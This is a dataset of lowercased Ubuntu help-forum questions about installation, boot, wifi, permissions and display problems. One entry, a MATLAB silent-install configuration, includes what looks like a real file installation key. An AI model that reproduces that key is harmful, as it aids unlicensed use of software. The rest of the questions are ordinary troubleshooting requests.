417502	planning storage	i 've just bought a new laptop ( asus ss551lb ) and decided to install an ubuntu on it ( for the first time after many years with windows ) . i have two storage devices : ssd of 24gb , and a regular disk with 750gb . upon installation of ubuntu13.10 , i used the 24gb device to install the os . this has created the following partitions : nadav @ nadav-pc : ~ $ df -h filesystem size used avail use % mounted on /dev/sdb2 14g 4.5g 8.6g 35 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 787m 1.2m 786m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 288k 3.9g 1 % /run/shm none 100m 48k 100m 1 % /run/user /dev/sdb1 487m 3.3m 483m 1 % /boot/efi /dev/sda2 14g 8.0k 14g 1 % /media/nadav/b498-74ed /dev/sda1 685g 49m 685g 1 % /media/nadav/fd_beta9sr2 first , i do n't quite understand why is the 28gb device divided into sdb2 and sda2 , but let 's leave it for now . more annoyingly , the last two directories ( /media/nadav/b498-74ed and /media/nadav/fd_beta9sr2 ) are not automatically mounted upon booting of the system ; i need to manually go to files- > devices- > ( double click these devices ) in order to activate them after each time i boot . and now for the most important issue i wanted to consult with you - how should i plan my storage ? as you can see , i have very little ssd storage . i want to use it wisely to boost those applications that i use the most ( including the os booting of course ) , but i do n't want it to become a bottle-neck later on . so i want all the new applications i install , as well as all data/pictures/movies , to be on the regular disk by default ( unless i specifically ask otherwise - to install a software i 'm going to use very often on the ssd ) . is it possible ? how should i configure that ? i 'm sorry if my post came out a bit unorganized . all these stuff are just really new for me .
417505	black backgrounds on options panels	so , somewhere along my linux-ing , i must have messed something up , because on a lot of the settings windows ( not all ) , where there should be a white background , there is a black one . oddly , though , after taking a screenshot of the windows , they seem to have transparent , not black , backgrounds ... as an example , here 's what the `` details '' panel looks like : here 's what a screenshot gives me : and here 's what i actually see : thanks for the help in advance !
417508	how to modify grub boot menu ?	the system am looking after has two hard drives of 80gb each , with about 8 partitions between them ; primary and extended . it has intel pentium 4 and 2gb rams the following software were installed in them as listed in the grub boot menu . grub4dos 0.4.4 2009-06-20 , memory : 640k / 1014m , memend : 0x48d2a lnux mint 11 kalya ( sdb6 ) windows xp professional sp3 ( sda1 ) linux puppy 5.4.2 precise ( sda3/puppy5.4.2 ) ubuntu 11.04 natty narwhal ( sdb8 ) linux-puppy 5.2.5 lucid ( sda3/puppy525 ) linux-puppy 5.3.3 slacko ( sda3/puppyslacko5.3.3 ) advanced menu lacking knowledge of linux decided to remove all partitions and keep only two primary partitions on each drive . in result , the situation now is two drives with 80gb each . on one drive , all the 80gb are unallocated space and would like to keep it like that until i read through the vast contributions and have the hang of linux distributions . on the other drive the 80gb are used for the mbr and two primary partitions , both ntfs filesystem , 70gb for the root bootable with windows xp preinstalled and the rest for the 2nd partition which is reserved for use as recovery . the problem is , grub boot menu did not reflect this change . it is still showing the same old list ( the 7 items listed earlier at top ) of bootable programs . reading an article by dedoimedo i thought i might be able to find where grub was installed and manually remove the entries from the boot menu : but didn’t get to fully understand it . i also thought i might find grub stage 2 files or directory in the root directory with windows xp , so i made file search in windows explorer but it returned zero result . i appreciate any help toward answering the following ; is it possible to substitute grub with windows own bootloader and how to do that ? how to find where grub’s stage 1 & 2 files are installed ; what are files or directory names ? how to change the list on grub’s boot menu , if i have to retain grub ? i understand that grub’s stage 1 could be found in the first sector installed alongside the mbr but how to find it ? i have linux mint 16 live , system rescue.iso and gparted live.iso ( which i used to delete the partitions ) : all of them are on cd’s . there were lots of useful command strings in dedoimedo’s article including complete command listing on how to add os to grub menu . i thought removing programs from the menu would just be the reverse of adding a program : the problem is i was not able to do the first step of changing the command cursor / line from mint $ character to grub directory . your help much appreciated
417509	ubuntu 12.04 launcher and overall style change	i recently restarted my computer and when it turned back on the unity launcher appearance was different . originally the icons would stack at the bottom unless i moved the courser over them , and then they would expand and scroll on their own just by moving the courser up or down , and i also used to be able to drag and move the icons around to an order that i liked . now they are all locked in place and instead of collapsing they scroll offscreen up or down and i personally find it annoying . the overall appearance of the computer also looks different , such as instead of showing large icons of the programs running when i use the alt+tab key command , and then expanding to show the pages that are open , it shows a small grey box with small icons of the programs currently running and that 's it . another example is when i opened the dash home it used to cover the entire screen but now it just extends over the top left corner to about half way down and half way to the right of the screen . does anyone know how to change these settings ?
417514	encfs not decrypting on clean install	i did a clean install of 12.04 ( after a failed upgrade to 12.10 - beware the graphics drivers ) i had used encfs + dropbox to create an encrypted backup . i have downloaded the .encrypted files , the encfs6.xml file is there , unencrypted . but my unencrypted directory can not decrypt the encrypted files encfs ~/dropbox/.encrypt ~/encrypt so the files are there on ~/dropbox/.encrypt and my encryption key has not changed , but for some reason my new ~/encrypt drive can not see/decrypt these files , which is slowing down my recovery . fusemount ? permissioning ? versions of encfs ? i am stumped .
417516	ubuntu 12.04lts server : can not get isc-dhcp-server to start	when i try and start isc-dhcp-server i get a ca n't open /etc/bind/rndc.key : permission denied so per instructions from ubuntu site i added to /etc/apparmor/usr.sbin.dhcpd /etc/bind/r , /etc/bind/**r , saved file and tried to reload per apparmor guide cat /etc/apparmor.d/profile.name | sudo apparmor_parser -r and i now get an this message setting /etc/apparmor.d/user.sbin.dhcpd to complain mode . warning fro stdin ( line1 ) : /sbin.apparmor_parser : can not use or update cache , disable , or force-complain via stdin apparmor parser error , in stdin line 27 : syntax error , unexpected tok_end_of rule , expecting tok_mode what does this mean ? i have looked at line 27 which is where i inserted the above statement into usr.sbin.dhcpd i am just trying to install a dns and dhcp with ddns and yes i am following all the guides . anybody have a clue i understand it is a permissions problem but what i did should have taken care of it ?
417517	wordpress ca n't install plugins	this what i get when i try to install wordpress plugins or themes on ubuntu 12.04 downloading install package from https : //downloads.wordpress.org/plugin/simple-social-icons.1.0.5.zip… unpacking the package… installing the plugin… could not create directory . /var/www/wordpress/wp-content/plugins/simple-social-icons/ plugin install failed .
417519	ubuntu 12.04 wireless problem in hp pavilion g6	this is the first time i use a linux distribution and i have a problem . i installed ubuntu without any problems but i can not connect networks . i simply can not turn on wifi because function keys do not work anymore . i am a beginner but , i think it can be a result of not having a driver for wireless , but i do not know how to find or install linux drivers.i do not have a lot of knowledge about linux so please try to be simple as possible . thanks . edit : now i am able to use function keys but still i can not turn on the wifi . edit 2 : my wireless card is broadcom bcm4313 802.11b/g/n
417523	deja dup returns an error	i created a backup of my home directory using deja dup . i had the system archive the backup to an external hard drive formatted with ntfs . when i tried to restore the backup to a new install of ubuntu 12.04 i received an error failed to read /tmp/duplicity-gvtjxb-tempdir/mktemp-norajd-2 : ( class 'zlib.error ' > , error ( 'error -3 while decompressing : invalid block type ' , ) , traceback object at 0x12553b0 > ) when i untarred the signature file i received the following error : gzip : stdin : invalid compressed data -- format violated tar : unexpected eof in archive tar : unexpected eof in archive tar : error is not recoverable : exiting now i have been able to extract about 50 % of the files using a loop to untar the backups directly but about half failed with invalid block errors , crc errors and other things that make me think that the ntfs format corrupted the initial process somehow . i fiddled with fixgz on a few files but no joy .
417526	how to connect to a shared folder in windows xp ?	alright , so i am trying to access a shared folder on windows xp ( on another computer ) . both are connected to the internet and on the same network . they run in windows virtual machines ( that came with windows 7 , ca n't install virtualbox ) . does anyone know how to access it ? some steps or a guide would help since im pretty much a noob in lubuntu . thanks !
417530	why some software are n't detectable by the system ?	i downloaded scid from the software center , as far as i know , everything we download from the center should be an apt package , thus it should be detectable by the system . however , scid is not listed in the menu of installed apps , the default application finder does not find it , nor synapse , they find everything but scid . why ?
417531	is it possible to `` trick '' ppa 's to think you have installed 12.10 while actually running 12.04 ?	i 've been having some trouble manually installing packages and so i was wondering if i can `` trick '' the gnome 3 team 's ppa to think i 'm using ubuntu 12.10 , so i can install gnome 3.6 software easily on ubuntu 12.04 . once it 's done , though , i do want to change it back to 12.04 instead of the `` fake '' 12.10 . so , what this boils down to : how can i temporarily change my version identifier ?
417532	can not access to external usb hdd	i have an external hard drive but can not access the information on it . i tried to access via ubuntu and windows , but both show the same message : device `` 0 megabytes '' . i tried to mount the device but it shows this message : mount : only root user can mount /dev/sdb on /mnt/usb-jmicron_usb_to_ata_atapi_bridge_152d203380b6-0:0
417533	change unity dash lens	may have my terminology wrong here , but the unity dash is a utility launched by clicking the little unity logo on the top left , and the lens is the window that opens out and filters results ? anyway , my unity dash appears to be stuck on the social lens , and i ca n't search my system and the store for applications and things , like i used to . how do i change my unity dash lens ?
417539	how to set up dual monitors properly	all the solutions i 'm seeing seem to relate to people putting two monitors on the same graphics card.i want/need one on the graphics card and one on the motherboard 's integrated graphics vga port . i am running : lubuntu 13.10 nvidia driver 319.60 nvidia gforce gt 430 asus motherboard ( ca n't find the number ) with a core i5 processor and integrated intel graphics . a 42 '' monitor as my main display a 19 '' monitor as my secondary display what i wanted : to have both displays available simultaneously , the large one for working on and the smaller one displaying a web browser to look things up on as i work . what 's happening : the large monitor on the nvidia card is displaying x-windows as expected . the smaller display the on motherboard 's integrated intel video output displays nothing . here 's the odd thing : if i switch to a terminal ( ctrl-alt-f3 , for example ) , the large monitor loses it 's signal and the small monitor displays the terminal view . if i log in and run `` top '' , just to get a live , full screen display , it functions as expected . when i switch to the x-server again ( ctrl-alt-f7 ) , the large monitor comes back on with the x-server display but the small monitor continues to display as well , although the screen is not updating ( ie . `` top '' has stopped running . what i 've tried : installing randr : this only sees the large monitor . running nvidia-settings both as root : this only sees the nvidia ( large ) display . this does n't surprise me , however , as i would have been surprised to see nvidia-setup configure an intel display , or even acknowledge that one existed . changing the additional drivers to xorg - xserver -- nouveau display driver or nvidia 319 - updates does not change anything . before anyone says anything about it : both monitors use vga adapters so i a n't simply put one on the nvidia 's dvi port without using an adapter which is currently in use on another pc . i would like an nvidia/intel solution , as i 'm sure one exisits . i did this years ago with windows xp . it must be doable under linux .
417542	how to enable wireless connection	after installing ubuntu 13.10 , my laptop can’t connect to wireless any more . i tried to fix it by following this thread on linuxquestions , but it does n't solve my problem . this is my output to run the command : sudo rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : yes i tried to turn on the soft blocked wireless by the command : rfkill unblock all but it doesn’t work .
417546	grub error with raid when other hdd 's exist	i had this exact issue with debian . grub has no issues loading at all as long as all of my hdd 's are turned off except for my hardware raid array . when there 's more than just my raid , it fails to find the uuid . luckily i run a separate power supply for my hdd 's , raid , and system , so it 's easy to simply switch off the hdd 's upon boot . from the grub recovery i get dumped into , upon performing a ls , i only get the results of everything except for the raid in which the os is installed , however if only the raid is powered on , and the other hdd 's are all off , it loads grub as usual . it gives an error that it can not find the device uuid . anyone have some insight as to why grub can only see the raid if no other hdd 's exist ? luckily it 's as simple as flipping a switch whenever i have to reboot , but it 'd be nice to be able to have an unattended reboot . hardware : rs2bl080 , dx58so raid is in a raid5 configuration , if that 's relevant .
417551	hdmi audio nvidia gt 220	i 'm using ubuntu 13.10 , and propietary drivers , hdmi video works great but it does n't have audio , is there any way to repair it ?
417552	managing the startup applications	i want to add avant window navigator as a startup application . but what should i write on the command and comment box ?
417553	how to install ubuntu on a laptop that has fedora	i simply want to get rid of the latest version of fedora that is currently on my laptop and install ubuntu instead . can someone please tell me how ? i followed the `` get ubuntu '' links on the site but it does n't seem to work .
417555	`` restart now '' after installation error	i installed ubuntu 12.04 and when i clicked the 'restart now ' button it says there was a problem with the virtual manager and it must close the program . what could be wrong ? i have an hp g60 with a pentium dual core t4300 .
417556	how can i disable `` open file '' option under file menu tab in firefox browser ?	how can i disable `` open file '' option under file menu tab in firefox programmatically ? what code do i have to change ?
417559	ubuntu 12.04 shortcuts with super key does n't work	i 'm using ubuntu 12.04 lts but now i ca n't use shortcuts like right-left . up-down are working . i installed dconfig-tools and in the path org/gnome/desktop/wm/keybindings i tried to create those shortcuts writing [ 'right ' ] , [ 'right ' ] and anyone works . i do n't know why [ 'up-down ' ] are working , they even are n't specified in that place in dconfig . when i take a window with the mouse and i carry it to a side it does n't fix as it use to fix before i get the problem , in the half of the screen . another thing , i started getting this problem when i change the computer but i kept the harddrive . i 'll appreciate any help guys
417561	getting issue with file permissions in ubuntu 10.04	i 've a development desktop having ubuntu 10.04 , apache2 & php 5.3.2 installed . i 've given 0777 permissions to my web application root folder and apache2 is also running under current username . but sometimes following files error is getting , file_put_contents ( /var/www/kohana_project/application/cache/kohana_find_file_paths ) : failed to open stream : permission denied . for every request above file need to update and execute but error occurs rarely . is any one have idea how to fix this issue ? and one thing current logged-in user and www-data have full permissions on kohana_project directory and its contents .
417564	authentication failed while creating folder in file system	am very new to linux environment and am eager to learn , so i thought of installing ubuntu . while creating a folder in file system i am getting `` authentication failed '' . i am using ubuntu in virtualbox . what is file system ? is that kind of drive or the os drive ?
417570	rooting sony xperia p ( android 4.1 )	i want to root my sony xperia p ( 4.1 ) . i 've no idea on it . how can i do it via ubuntu 12.04 ?
417571	how to type lines of command for python ?	i want to encode a python command in the terminal but it executes them as i press enter to go to the next line of command . how can i prevent the terminal from executing the command until i finish typing all the command lines ?
417572	when installing installion type is blank ( no options )	when i am trying to install ubuntu it goes good int ill i get to the step installation type step and when i am there i get no options and i know even before that i should get a option to duel boot and stuff like that but it did not show my that tab ether anyway when i am at installation type it gives me no options only but that works is quite or back . i have read that its a problem with raid but i do not know if i want to get rid of it i am kind of a noob at this stuff but i do n't know if deleting is a good idea is there any other ways i can fix this problem
417579	resin server - ca n't install into eclipse kepler	i 'm using centos 6.4 . i have downloaded resin server from the this official website . i have the folder in /home/admin/ . i followed this site for adding resin server into eclipse . but could n't able to see resin option . is there any way to add resin server into eclipse . ?
417580	why partition is not showing , sudo fdisk - l	i 'm really new to ubuntu and pretty scared with things right now . there were two partitions in the system partition 1 and partition 2 with ext4 format . since i could n't access them ( i mean i could n't create a folder or document or anything ) i deleted these partitions and created new ones d and e with ntfs format . now when i give sufo fdisk-l what i get is this sujatha @ sujatha-cellapp : ~ $ sudo fdisk -l [ sudo ] password for sujatha : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 976773167 488386583+ ee gpt sujatha @ sujatha-cellapp : ~ $ but i had gparted create two partions d and e and i could see them then why it 's not shown above.. ? ? also while starting system i could see a message showing like this the disk drive for /partition 1 is not ready yet or not found continue to wait , or press s to akip mounting or f for manual recovery my gparted after partition looks like this after partition partition file system mount point label size used unused flags /dev/sda1 ext4 / 47.68gib 43.57gib 4.11gib /dev/sda2 linux-swap 977.00mib -- -- /dev/sda4 ntfs d 208.08gib 70.98mib 208.02gib msftdata /dev/sda5 ntfs e 208.09gib 70.98mib 208.08gib msftdata /dev/sda3 fat32 /boot/efi 976.00mib 5.22mib 970.78mib boot unallocated 1.02mib -- --
417582	in ubuntu13.10 , unable to add and/or select `` hibernate '' option in power setting 's `` when lid is closed '' dropdown	i 've seen numerous helps/guides in enabling hibernate option , but so far none have answered my need in adding the `` hibernate '' option under power settings > `` when lid is closed '' dropdown menu . i 've even carefully followed the following guide and still does n't work : https : //help.ubuntu.com/13.10/ubuntu-help/power-hibernate.html ( note : although when i was using 12.04 , a similar guide worked back then ) other actions i 've taken but with no success : edited the pkla file ( s ) under /var/lib ... . and /etc/ pertaining to hibernation used dconf-editor and edited the entries under org > gnome > settings-daemon > plugins > power relating to when the lid is closed .
417584	unable to install matlab 2011 in ubuntu 12.04	setup read file says that go to mount folder and type install -inputfile i did all these things ... but nothing happen and terminal shows that root @ labe-1294-0-170 : /media/matlab # install -inputfile installer_input install : invalid option -- 'i' try `install -- help ' for more information after that i copied all the files into a folder and than give 777 permission to all the files which are present in the matlab folder . but nothing happen . root @ labe-1294-0-170 : /home/umeshkumar/desktop/mat # ./install installer install_guide_ja_jp.pdf installer_input.txt install_guide.pdf root @ labe-1294-0-170 : /home/umeshkumar/desktop/mat # ./installer ./installer : line 169 : product.aerospace_blockset : command not found ./installer : line 170 : product.aerospace_toolbox : command not found ./installer : line 171 : product.bioinformatics_toolbox : command not found ./installer : line 172 : product.communications_system_toolbox : command not found ./installer : line 173 : product.computer_vision_system_toolbox : command not found ./installer : line 174 : product.control_system_toolbox : command not found ./installer : line 175 : product.curve_fitting_toolbox : command not found ./installer : line 176 : product.do_qualification_kit : command not found ./installer : line 177 : product.dsp_system_toolbox : command not found ./installer : line 178 : product.data_acquisition_toolbox : command not found ./installer : line 179 : product.database_toolbox : command not found ./installer : line 180 : product.datafeed_toolbox : command not found ./installer : line 181 : product.eda_simulator_link : command not found ./installer : line 182 : product.econometrics_toolbox : command not found ./installer : line 183 : product.embedded_coder : command not found ./installer : line 184 : product.filter_design_hdl_coder : command not found ./installer : line 185 : product.financial_derivatives_toolbox : command not found ./installer : line 186 : product.financial_toolbox : command not found ./installer : line 187 : product.fixed_income_toolbox : command not found ./installer : line 188 : product.fixed_point_toolbox : command not found ./installer : line 189 : product.fuzzy_logic_toolbox : command not found ./installer : line 190 : product.gauges_blockset : command not found ./installer : line 191 : product.global_optimization_toolbox : command not found ./installer : line 192 : product.iec_certification_kit : command not found ./installer : line 193 : product.image_acquisition_toolbox : command not found ./installer : line 194 : product.image_processing_toolbox : command not found ./installer : line 195 : product.instrument_control_toolbox : command not found ./installer : line 196 : product.matlab : command not found ./installer : line 197 : product.matlab_builder_ex : command not found ./installer : line 198 : product.matlab_builder_ja : command not found ./installer : line 199 : product.matlab_builder_ne : command not found ./installer : line 200 : product.matlab_coder : command not found ./installer : line 201 : product.matlab_compiler : command not found ./installer : line 202 : product.matlab_distributed_computing_server : command not found ./installer : line 203 : product.matlab_report_generator : command not found ./installer : line 204 : product.mapping_toolbox : command not found ./installer : line 205 : product.model_predictive_control_toolbox : command not found ./installer : line 206 : product.model_based_calibration_toolbox : command not found ./installer : line 207 : product.neural_network_toolbox : command not found ./installer : line 208 : product.opc_toolbox : command not found ./installer : line 209 : product.optimization_toolbox : command not found ./installer : line 210 : product.parallel_computing_toolbox : command not found ./installer : line 211 : product.partial_differential_equation_toolbox : command not found ./installer : line 212 : product.phased_array_system_toolbox : command not found ./installer : line 213 : product.rf_toolbox : command not found ./installer : line 214 : product.real_time_windows_target : command not found ./installer : line 215 : product.robust_control_toolbox : command not found ./installer : line 216 : product.signal_processing_toolbox : command not found ./installer : line 217 : product.simbiology : command not found ./installer : line 218 : product.simdriveline : command not found ./installer : line 219 : product.simelectronics : command not found ./installer : line 220 : product.simevents : command not found ./installer : line 221 : product.simhydraulics : command not found ./installer : line 222 : product.simmechanics : command not found ./installer : line 223 : product.simpowersystems : command not found ./installer : line 224 : product.simrf : command not found ./installer : line 225 : product.simscape : command not found ./installer : line 226 : product.simulink : command not found ./installer : line 227 : product.simulink_3d_animation : command not found ./installer : line 228 : product.simulink_coder : command not found ./installer : line 229 : product.simulink_control_design : command not found ./installer : line 230 : product.simulink_design_optimization : command not found ./installer : line 231 : product.simulink_design_verifier : command not found ./installer : line 232 : product.simulink_fixed_point : command not found ./installer : line 233 : product.simulink_hdl_coder : command not found ./installer : line 234 : product.simulink_plc_coder : command not found ./installer : line 235 : product.simulink_report_generator : command not found ./installer : line 236 : product.simulink_verification_and_validation : command not found ./installer : line 237 : product.spreadsheet_link_ex : command not found ./installer : line 238 : product.stateflow : command not found ./installer : line 239 : product.statistics_toolbox : command not found ./installer : line 240 : product.symbolic_math_toolbox : command not found ./installer : line 241 : product.system_identification_toolbox : command not found ./installer : line 242 : product.systemtest : command not found ./installer : line 243 : product.vehicle_network_toolbox : command not found ./installer : line 244 : product.wavelet_toolbox : command not found ./installer : line 245 : product.xpc_target : command not found ./installer : line 246 : product.xpc_target_embedded_option : command not found i made changes in install file for the automatic installation . here is my file use this file to specify parameters required by the installer at runtime . instructions for using this file . create a copy of this template file and fill in the required information . uncomment and set desired values ; all available values are listed below . launch the installer from the command line , using the -inputfile option to specify the name of your installer initialization file . ( windows ) setup.exe -inputfile ( mac/unix ) install -inputfile note : if you want to run the activation application in silent mode immediately after the installer completes , you must create an activation initialization file and specify its name as the value of the activationpropertiesfile= option . you can also pass the name of the activation initialization file to the installer using the -activationpropertiesfile command line option . specify installation folder example : ( windows ) destinationfolder=c : \program files\matlab\rxxxx ( unix ) destinationfolder=/usr/local/rxxxx ( mac ) destinationfolder=/applications destinationfolder=/usr/local/matlab specify file installation key example : fileinstallationkey=xxxxx-xxxxx-xxxxx-xxxxx ... .. fileinstallationkey=27148-10273-27823-12342-16466 accept license agreement you must agree to the license agreement to install mathworks products . the license agreement can be found in the license.txt file at the root level of the installation dvd . example : agreetolicense=yes agreetolicense=yes specify output log specify full path of file into which you want the results of the installation to be recorded . example : ( windows ) outputfile=c : \temp\mathworks_ < user_name > .log ( unix/mac ) outputfile=/tmp/mathworks_ < user_name > .log outputfile=/tmp/mat/matlab.log specify installer mode interactive : run the installer gui , waiting for user input on all dialog boxes . silent : run the installer without displaying the gui . automated : run the installer gui , displaying all dialog boxes , but only waiting for user input on dialogs that are missing required input . set to interactive , silent , or automated . mode=interactive specify length of time dialog boxes are displayed specify how long the installer dialog boxes are displayed , in milliseconds . note : use this value only if you set the installer mode to automated . by default , the dialog boxes display on the screen for one second . example : ( to specify a value of 1 second . ) automatedmodetimeout=1000 automatedmodetimeout= specify activation properties file ( for non-network license types only ) enter the path to an existing file that contains properties to configure the activation process . activationpropertiesfile= begin : options for network license types specify path to license file ( required for network license types only ) this value is required when installing either the license manager or when installing as a network end-user example : ( windows ) licensepath=c : \temp\license.dat ( unix ) licensepath=/tmp/license.dat licensepath= choose to install license manager ( for network license types only ) installs license manager files to disk . note : you only need to install the license manager files on your license server . set to true or false . lmgrfiles= install license manager as a service ( for network license types only ) configure the license manager as a service on windows . note : not applicable for unix or mac . note : the lmgr_files option ( set in previous step ) must also be set to true . set to true or false . lmgrservice= end : options for network license types begin - windows only options choose to create windows desktop shortcut set to true if you would like the installer to create a desktop shortcut icon when matlab is installed or false if you do n't want the shortcut created . set to true or false . desktopshortcut= choose to add shortcut to windows start menu set to true if you would like the installer to create a start menu shortcut icon when matlab is installed or false if you do n't want the shortcut created . set to true or false . startmenushortcut= end - windows only options specify products you want to install by default , the installer installs all the products and documentation for which you are licensed . products you are not licensed for are not installed , even if they are listed here . to install specific products , uncomment the line for the product ( s ) you want to install . product.aerospace_blockset product.aerospace_toolbox product.bioinformatics_toolbox product.communications_system_toolbox product.computer_vision_system_toolbox product.control_system_toolbox product.curve_fitting_toolbox product.do_qualification_kit product.dsp_system_toolbox product.data_acquisition_toolbox product.database_toolbox product.datafeed_toolbox product.eda_simulator_link product.econometrics_toolbox product.embedded_coder product.filter_design_hdl_coder product.financial_derivatives_toolbox product.financial_toolbox product.fixed_income_toolbox product.fixed_point_toolbox product.fuzzy_logic_toolbox product.gauges_blockset product.global_optimization_toolbox product.iec_certification_kit product.image_acquisition_toolbox product.image_processing_toolbox product.instrument_control_toolbox product.matlab product.matlab_builder_ex product.matlab_builder_ja product.matlab_builder_ne product.matlab_coder product.matlab_compiler product.matlab_distributed_computing_server product.matlab_report_generator product.mapping_toolbox product.model_predictive_control_toolbox product.model_based_calibration_toolbox product.neural_network_toolbox product.opc_toolbox product.optimization_toolbox product.parallel_computing_toolbox product.partial_differential_equation_toolbox product.phased_array_system_toolbox product.rf_toolbox product.real_time_windows_target product.robust_control_toolbox product.signal_processing_toolbox product.simbiology product.simdriveline product.simelectronics product.simevents product.simhydraulics product.simmechanics product.simpowersystems product.simrf product.simscape product.simulink product.simulink_3d_animation product.simulink_coder product.simulink_control_design product.simulink_design_optimization product.simulink_design_verifier product.simulink_fixed_point product.simulink_hdl_coder product.simulink_plc_coder product.simulink_report_generator product.simulink_verification_and_validation product.spreadsheet_link_ex product.stateflow product.statistics_toolbox product.symbolic_math_toolbox product.system_identification_toolbox product.systemtest product.vehicle_network_toolbox product.wavelet_toolbox product.xpc_target product.xpc_target_embedded_option but it shows error that : root @ labe-1294-0-170 : /home/umeshkumar/desktop/mat # ./installer ./installer : line 169 : product.aerospace_blockset : command not found ./installer : line 170 : product.aerospace_toolbox : command not found ./installer : line 171 : product.bioinformatics_toolbox : command not found ./installer : line 172 : product.communications_system_toolbox : command not found ./installer : line 173 : product.computer_vision_system_toolbox : command not found ./installer : line 174 : product.control_system_toolbox : command not found ./installer : line 175 : product.curve_fitting_toolbox : command not found ./installer : line 176 : product.do_qualification_kit : command not found
417586	slow performance on 13.04 - expert opinion required	my laptop is dell xps m1330 memory : 2gb processor : intel core 2 duo cpu t5450 @ 1.66ghz x 2 graphics : intel 965gm x86/mmx/sse2 os type : 32-bit disk : 500 gb updating myself since 12.04 and now currently on 13.04 . the performance of my system is now really bad . slow like anything performance wise . this is my df -h output /dev/sda1 92g 9.8g 78g 12 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 996m 4.0k 996m 1 % /dev tmpfs 201m 1.2m 200m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1004m 1.3m 1003m 1 % /run/shm none 100m 32k 100m 1 % /run/user /dev/sda3 138g 110g 21g 85 % /home /dev/sda5 226g 194g 21g 91 % /home1 this is my free output total used free shared buffers cached mem : 2055440 1880676 174764 0 40492 948284 -/+ buffers/cache : 891900 1163540 swap : 3999740 37548 3962192 this is my top output top - 11:53:47 up 2:19 , 1 user , load average : 0.16 , 0.48 , 0.78 tasks : 216 total , 2 running , 212 sleeping , 0 stopped , 2 zombie % cpu ( s ) : 12.7 us , 2.2 sy , 0.0 ni , 85.1 id , 0.0 wa , 0.0 hi , 0.0 si , 0.0 st kib mem : 2055440 total , 1883344 used , 172096 free , 40576 buffers kib swap : 3999740 total , 37548 used , 3962192 free , 947028 cached pid user pr ni virt res shr s % cpu % mem time+ command 3136 faisal-x 20 0 419m 159m 27m s 6.6 7.9 10:31.81 chrome 2904 faisal-x 20 0 745m 118m 35m s 4.0 5.9 8:25.63 chrome 2994 faisal-x 20 0 238m 41m 18m s 3.3 2.1 2:19.58 chrome 2341 faisal-x 20 0 147m 25m 12m s 2.3 1.3 0:20.09 guake 7790 faisal-x 20 0 256m 57m 24m s 2.3 2.9 0:25.17 chrome 7800 faisal-x 20 0 250m 53m 25m s 2.3 2.6 0:23.73 chrome 1253 root 20 0 159m 32m 20m s 2.0 1.6 2:11.34 xorg 7285 faisal-x 20 0 318m 99m 28m s 2.0 4.9 1:17.46 chrome 7783 faisal-x 20 0 280m 69m 24m s 2.0 3.5 0:27.04 chrome 7808 faisal-x 20 0 249m 54m 24m s 2.0 2.7 0:19.05 chrome 7815 faisal-x 20 0 272m 93m 26m s 1.3 4.6 0:44.03 chrome 8823 faisal-x 20 0 5332 1388 968 r 0.7 0.1 0:00.13 top 24 root 20 0 0 0 0 r 0.3 0.0 0:08.72 kworker/0:1 2074 root 20 0 13316 996 904 s 0.3 0.0 0:27.43 nmbd 2981 faisal-x 20 0 234m 31m 15m s 0.3 1.6 0:00.99 chrome 3156 faisal-x 20 0 156m 11m 7676 s 0.3 0.6 0:12.90 chrome 1 root 20 0 4052 1920 1148 s 0.0 0.1 0:03.23 init at this moment of output , i have pidgin started configured as office-communicator for lync connectivity and gmail configured . further i have google chrome started with around 7 tabs . mainly only this is running upfront . i need suggestions , please do n't make me install os again as i do n't want too and rather it is not a good practice either . thanks
417587	ubuntu with linux 3.5.0-45-generic wo n't boot . earlier version will , but wrong resolution	i have a dell xps m1210 , with vesa : g72 board - bali1 graphics . i 'm running ubuntu 12.04 , and my updates are current . i do n't know a lot about computers or linux . i use linux because i like the open source model , and because it 's essentially free . i ca n't afford to buy a new computer at this time . this problem began with a system freeze . i had to force a shut down by holding down the power button . since then , when i restart the computer , it fails to boot into the latest version of the os ( ubuntu with linux 3.5.0-45-generic , as noted in the title of this thread . ) while starting up , a bunch of text flashes by , which i assume to be bios . there seem to be some error messages , but they go by too quickly to catch . the process eventually comes to a point where all i have on my screen is a flashing cursor in the upper right corner . at this point , i have only found two ways to proceed . one is to hold the power button to get the computer to shut down . the other is to press the power button for maybe half a second . if i do this , some more text flashes by . it 's on the screen long enough for me to catch the last couple lines , which say : load fallback graphics device [ fail ] will now halt then , the computer shuts down . when i restart it , i get the grub screen , which allows me to select to boot into an older version of the os . if i select the immediately previous version , ubuntu with linux 3.5.0-44-generic , the system does boot fully . however , the display resolution is wrong . you 'll have to forgive me for not knowing what the correct resolution is , but the one my system boots into is obviously wrong , or , at least it 's not the one i 'm used to using . if i go to the system settings , and try to adjust the resolution to what i think it should be , i have only two options for resolution where i 'm used to seeing more . the two that i have are 1024x768 , and 800x600 . neither seems correct to me . is this a graphics problem ? is it repairable ? any help at all would be greatly appreciated .
417588	is there any ubuntu certification ?	i am a windows server administrator and mcse/mctip . i have been attracted towards ubuntu for long time and want to become a active participent and help businesses to use and grow using ubuntu . but i do not have much of technical knowledge in ubuntu/debian . so i am seeking technical course that will certify me as ubuntu server engineer and as a consultant i would be able to suggest businesses to implement ubuntu server and cloud infrastructure . i have gone though : ubuntu certification announced ; but not sure how to obtain that course .
417589	rtl8192cu tp-link wn8200nd cant connect sees the modem	i installed ubuntu 13.10 and bought a wireless card ( tplink wn8200nd ) but cant connect to the modem . it sees the modem , but ca n't connect .
